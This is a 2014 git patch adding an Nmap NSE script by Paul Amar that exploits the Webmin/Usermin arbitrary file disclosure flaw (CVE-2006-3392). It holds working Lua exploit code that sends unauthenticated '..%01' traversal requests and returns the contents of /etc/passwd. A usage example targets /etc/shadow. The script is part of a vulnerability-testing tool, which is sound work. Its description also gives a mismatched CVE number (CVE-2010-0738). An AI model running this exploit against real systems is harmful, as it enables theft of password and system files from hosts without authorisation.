From 17ef614c49c7b2587e12ff91ce3979e079543a93 Mon Sep 17 00:00:00 2001
From: robert
Date: Sun, 4 May 2014 15:00:06 +0000
Subject: [PATCH] Added Paul Amar's Webmin File Disclosure NSE script (CVE-2006-3392).

---
 scripts/http-vuln-cve2006-3392.nse | 80 ++++++++++++++++++++++++++++++
 1 file changed, 80 insertions(+)
 create mode 100644 scripts/http-vuln-cve2006-3392.nse

diff --git a/scripts/http-vuln-cve2006-3392.nse b/scripts/http-vuln-cve2006-3392.nse
new file mode 100644
index 000000000..f6e7b56a0
--- /dev/null
+++ b/scripts/http-vuln-cve2006-3392.nse
@@ -0,0 +1,80 @@
+local http = require "http"
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local string = require "string"
+local vulns = require "vulns"
+
+description = [[
+Exploits a file disclosure vulnerability in Webmin (CVE-2010-0738)
+
+Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
+This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
+to bypass the removal of "../" directory traversal sequences.
+]]
+---
+-- @usage
+-- nmap -sV --script http-vuln-cve2006-3392
+-- nmap -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow
+-- @output
+-- PORT STATE SERVICE REASON
+-- 10000/tcp open webmin syn-ack
+-- | http-vuln-cve2006-3392:
+-- | VULNERABLE:
+-- | Webmin File Disclosure
+-- | State: VULNERABLE (Exploitable)
+-- | IDs: CVE:CVE-2006-3392
+-- | Description:
+-- | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
+-- | This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
+-- | to bypass the removal of "../" directory traversal sequences.
+-- | Disclosure date: 2006
+-- | Extra information:
+-- | Proof of Concept:/unauthenticated/..%01/..%01/(..)/etc/passwd
+-- | References:
+-- | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
+-- |_ http://www.exploit-db.com/exploits/1997/
+--
+-- @args http-vuln-cve2006-3392.file . Default: /etc/passwd
+---
+
+author = "Paul AMAR "
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"exploit","vuln","intrusive"}
+
+portrule = shortport.portnumber({10000})
+
+action = function(host, port)
+ local file_var = stdnse.get_script_args(SCRIPT_NAME .. ".file") or "/etc/passwd"
+
+ local vuln = {
+ title = 'Webmin File Disclosure',
+ state = vulns.STATE.NOT_VULN, -- default
+ IDS = {CVE = 'CVE-2006-3392'},
+ description = [[
+Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
+This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
+to bypass the removal of "../" directory traversal sequences.
+]],
+ references = {
+ 'http://www.exploit-db.com/exploits/1997/',
+ 'http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure',
+ },
+ dates = {
+ disclosure = {year = '2006', month = '06', day = '29'},
+ },
+ }
+
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+ local url = "/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01" .. file_var
+
+ stdnse.print_debug(1, "Getting " .. file_var)
+
+ local detection_session = http.get(host, port, url)
+
+ stdnse.print_debug(1, "Status code:"..detection_session.status)
+ if detection_session and detection_session.status == 200 then
+ vuln.state = vulns.STATE.EXPLOIT
+ stdnse.print_debug(1, detection_session.body)
+ return vuln_report:make_output(detection_session.body)
+ end
+end
\ No newline at end of file